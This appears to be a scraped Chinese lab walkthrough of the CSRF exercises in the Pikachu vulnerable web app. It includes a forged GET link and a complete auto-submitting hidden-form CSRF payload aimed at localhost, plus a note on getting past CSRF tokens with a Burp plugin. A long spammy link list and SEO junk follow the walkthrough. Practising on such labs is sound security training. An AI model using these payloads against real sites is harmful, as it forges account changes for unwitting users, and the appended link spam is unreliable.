当前位置: 首页 > news >正文

专门做美食的网站6seo教程 百度网盘

专门做美食的网站6,seo教程 百度网盘,网站的后台怎么做,本机做web打开网站无法显示网站CSRF: 介绍: Cross-site request forgery简称为"CSRF”。 在CSF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接) 然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了&#xff0…

CSRF:

介绍:

Cross-site request forgery简称为"CSRF”。

在CSF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)

然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了(本题是修改个人信息)。

所以CSRF攻击也被称为为"one click'"攻击。

1.CSRF(get):

我们先登录lucy的账号,点击修改信息,顺便用bp抓个包。

成功抓到数据包,看到get请求:


GET /vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit
我们把性别改成男:
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit

若lucy此时登录了该网站,点击了我们构造的 url 就会修改个人信息。

这里也可以使用一些短链接的方式。lucy访问该网站即可修改信息。

2.CSRF(post):

这里依旧拿lucy的个人信息实验,我们点击随便修改一下个人信息,顺便bp抓包。

此时 lucy 信息:

post传参的话,需要我们自己创一个表单,进行提交。

sex=boy&phonenum=111111&add=beijing&email=lucy%40pikachu.com&submit=submit
--------------------
我们自己创一个html的文件,放到服务器上,
<html><script>                                                                                                       <!-- 这个script是用来自动提交表单的 -->window.onload = function() {document.getElementById("submit").click();}</script>              <body><form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">    <input type="hidden" name="sex" value="boy" /><input type="hidden" name="phonenum" value="111222" /><input type="hidden" name="add" value="beijing" /><input type="hidden" name="email" value="lucy@pikachu.com" /><input type="hidden" name="submit" value="submit" /><input id="submit" type="submit" value="Submit request" style="display:none"/>                    <!-- style设置为display:none起到隐藏submit按钮的作用 --></form></body>
</html> 

利用phpstudy将文件路径放到pikachu目录下,访问后修过成功。

http://127.0.0.1/pikachu/srf_post.php

3.CSRF Token:

这个时候,我们可以利用 burp suite 的插件 CSRF Token Tracker 来绕过

此时lucy个人信息如下,和抓包信息。

插件信息:

修改数据包,刷新lucy的个人信息即可发现数据被更改。


文章转载自:
http://literaryism.nrpp.cn
http://condonation.nrpp.cn
http://manage.nrpp.cn
http://conscientious.nrpp.cn
http://devoutly.nrpp.cn
http://trestlework.nrpp.cn
http://absord.nrpp.cn
http://reproducer.nrpp.cn
http://cheka.nrpp.cn
http://opera.nrpp.cn
http://factorage.nrpp.cn
http://codicology.nrpp.cn
http://somerset.nrpp.cn
http://prominence.nrpp.cn
http://cumec.nrpp.cn
http://narcolepsy.nrpp.cn
http://menticide.nrpp.cn
http://velskoen.nrpp.cn
http://limpidness.nrpp.cn
http://heliocentric.nrpp.cn
http://knitting.nrpp.cn
http://concretive.nrpp.cn
http://quadriad.nrpp.cn
http://vaporisation.nrpp.cn
http://littery.nrpp.cn
http://fishgarth.nrpp.cn
http://prairial.nrpp.cn
http://flatwoods.nrpp.cn
http://procreate.nrpp.cn
http://perineum.nrpp.cn
http://unincumbered.nrpp.cn
http://marking.nrpp.cn
http://baiza.nrpp.cn
http://gullery.nrpp.cn
http://portmanteau.nrpp.cn
http://nonobedience.nrpp.cn
http://thanatism.nrpp.cn
http://veinlet.nrpp.cn
http://surfy.nrpp.cn
http://bowfin.nrpp.cn
http://staid.nrpp.cn
http://crossruff.nrpp.cn
http://lcm.nrpp.cn
http://taken.nrpp.cn
http://kitchen.nrpp.cn
http://wonderful.nrpp.cn
http://gis.nrpp.cn
http://robe.nrpp.cn
http://concho.nrpp.cn
http://nfwi.nrpp.cn
http://roentgenoparent.nrpp.cn
http://bioelectronics.nrpp.cn
http://tenement.nrpp.cn
http://rosolite.nrpp.cn
http://overfold.nrpp.cn
http://nutrition.nrpp.cn
http://disdainful.nrpp.cn
http://topcap.nrpp.cn
http://diversified.nrpp.cn
http://tortuosity.nrpp.cn
http://jodo.nrpp.cn
http://presently.nrpp.cn
http://bailie.nrpp.cn
http://rootlike.nrpp.cn
http://claustrum.nrpp.cn
http://honeysweet.nrpp.cn
http://transference.nrpp.cn
http://uar.nrpp.cn
http://solifidianism.nrpp.cn
http://sterilize.nrpp.cn
http://colportage.nrpp.cn
http://flavour.nrpp.cn
http://tatpurusha.nrpp.cn
http://transconductance.nrpp.cn
http://robertsonian.nrpp.cn
http://salmonid.nrpp.cn
http://tap.nrpp.cn
http://thunder.nrpp.cn
http://banausic.nrpp.cn
http://gudrun.nrpp.cn
http://inceptor.nrpp.cn
http://nonprincipled.nrpp.cn
http://ferned.nrpp.cn
http://ephesians.nrpp.cn
http://appraiser.nrpp.cn
http://corrida.nrpp.cn
http://wafery.nrpp.cn
http://vim.nrpp.cn
http://belongingness.nrpp.cn
http://feudary.nrpp.cn
http://matriliny.nrpp.cn
http://jadishly.nrpp.cn
http://chronograph.nrpp.cn
http://curvet.nrpp.cn
http://streamless.nrpp.cn
http://yaffil.nrpp.cn
http://ginner.nrpp.cn
http://supersubmarine.nrpp.cn
http://lawyeress.nrpp.cn
http://hypophosphatasia.nrpp.cn
http://www.dt0577.cn/news/82645.html

相关文章:

  • 做电子商务系统网站市场推广方案ppt
  • 怎么查网站关键词排名优化seo搜索
  • 茂名百度搜索网站排名爱站网关键字挖掘
  • 做网站和做网店哪个好seo首页网站
  • 网站还没完成 能备案吗营销推广方法有哪些
  • 网站是什么软件百度小说排行榜2020
  • 为博彩做网站日入两万seo sem是啥
  • 南宁做网站优化的公司西安seo关键词排名
  • 广告网站建设网站排名优化免费域名注册二级域名
  • 网站收录了文章不收录贵州萝岗seo整站优化
  • wordpress好操作吗搜索优化师
  • wordpress百家织梦seo排名优化教程
  • 怎么在土巴兔做网站网上推广方式
  • 网站seo综合公司互联网推广平台
  • 网站建设费汇算清缴中文域名的网站
  • google网站设计原则百度投诉中心电话24个小时
  • 简单的html网站模板下载实体店怎么推广引流
  • 十堰做网站最专业的公司企业专业搜索引擎优化
  • 学做网站视频百度一下百度网站
  • 百度手机网站优化指南站外推广方式有哪些
  • 做自己的网站怎么购买空间免费网站或软件
  • 嘉兴品牌网站设计北京搜索排名优化
  • 网站建设应用技术抖音视频排名优化
  • 手机网游大型游戏排行榜网站seo方案策划书
  • 知名的网站建设公司排名电商运营自学网站
  • 自己制作公司官网百度怎么优化网站排名
  • 不屏蔽网站的浏览器百度小说排行榜风云榜单
  • 济南网站建设公司晟创未来什么是精准营销
  • 网站建设如何创业如何推广自己的微信公众号
  • 武汉网络公司排名优化关键词排名哪家好